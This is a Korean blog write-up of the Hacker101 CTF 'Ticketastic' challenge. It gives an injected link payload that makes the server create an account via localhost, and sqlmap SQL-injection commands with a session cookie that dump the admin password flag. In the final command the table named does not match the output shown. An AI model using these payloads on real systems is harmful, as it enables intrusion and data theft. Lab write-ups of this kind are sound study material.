본문으로 바로가기

[Hacker101 CTF] Ticketastic: Live Instance

category Wargame/Hacker101 CTF 2020. 2. 19. 01:49

Ticketastic: Demo Instance (Moderate, 0)

Ticketastic: Live Instance (Moderate, 5)

Flag0

데모 서비스에서 티켓을 실험해 보면, localhost 링크가 있을 때 그곳으로 request를 보내는 것으로 추정된다.

또 티켓의 제목과 내용에서 XSS가 발생하며, 계정을 만들 때 GET request를 보낸다는 점이 특이하다.

티켓 내용에 아래처럼 링크를 통해 새 계정을 만들게 하고, 들어가서 Flag Won't Work 티켓을 보면 답장에 쓰여 있는 플래그를 얻을 수 있다.

 

<script>
<a href="http://localhost/newUser?username=hack&password=hack&password1=hack" />
</script>

 

Flag: ^FLAG^ddab29013e8b59c8ccc4fa0504e8a1c392e58fc9f8708160a9a72ada0114343f$FLAG$

 

Flag1

/tickets 페이지를 볼 때 id에서 SQL Injection이 발생한다.

users 테이블에서 admin의 비밀번호에 플래그가 들어있다.

 

syine@MinetaLinux:~/repos/sqlmap-dev$ python3 sqlmap.py -u "http://35.227.24.107/54611fbb1a/ticket?id=1" --method=GET -p "id" --tamper=space2comment --cookie="session_level7b=eyJ1c2VyIjoiaGFjayJ9.ES2fsw.HQOBDT0S3j3FmKGXNKF7DEoBFIw" --dbs --threads=2
available databases [4]:
[*] information_schema
[*] level7
[*] mysql
[*] performance_schema
 
syine@MinetaLinux:~/repos/sqlmap-dev$ python3 sqlmap.py -u "http://35.227.24.107/54611fbb1a/ticket?id=1" --method=GET -p "id" --tamper=space2comment --cookie="session_level7b=eyJ1c2VyIjoiaGFjayJ9.ES2fsw.HQOBDT0S3j3FmKGXNKF7DEoBFIw" -D level7 --tables --threads=2
Database: level7
[2 tables]
+---------+
| tickets |
| users   |
+---------+
 
syine@MinetaLinux:~/repos/sqlmap-dev$ python3 sqlmap.py -u "http://35.227.24.107/54611fbb1a/ticket?id=1" --method=GET -p "id" --tamper=space2comment --cookie="session_level7b=eyJ1c2VyIjoiaGFjayJ9.ES2fsw.HQOBDT0S3j3FmKGXNKF7DEoBFIw" -D level7 -T tickets --dump --threads=2
Database: level7
Table: users
[2 entries]
+----+------------------------------------------------------------------------------+----------+
| id | password                                                                     | username |
+----+------------------------------------------------------------------------------+----------+
| 1  | ^FLAG^102430b3020286872516add11ef0835f86c1f1bccb5e4637e6c29c68cc8b32c2$FLAG$ | admin    |
| 2  | hack                                                                         | hack     |
+----+------------------------------------------------------------------------------+----------+

 

Flag: ^FLAG^102430b3020286872516add11ef0835f86c1f1bccb5e4637e6c29c68cc8b32c2$FLAG$

 

'Wargame > Hacker101 CTF' 카테고리의 다른 글

[Hacker101 CTF] Model E1337 - Rolling Code Lock  (0) 2020.02.21
[Hacker101 CTF] Petshop Pro  (0) 2020.02.19
[Hacker101 CTF] Postbook  (0) 2020.02.19
[Hacker101 CTF] Cody's First Blog  (0) 2020.02.18
[Hacker101 CTF] Photo Gallery  (0) 2020.02.18